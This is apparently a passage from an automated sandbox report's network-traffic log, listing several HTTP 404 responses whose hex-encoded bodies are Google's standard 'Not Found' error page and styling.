62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
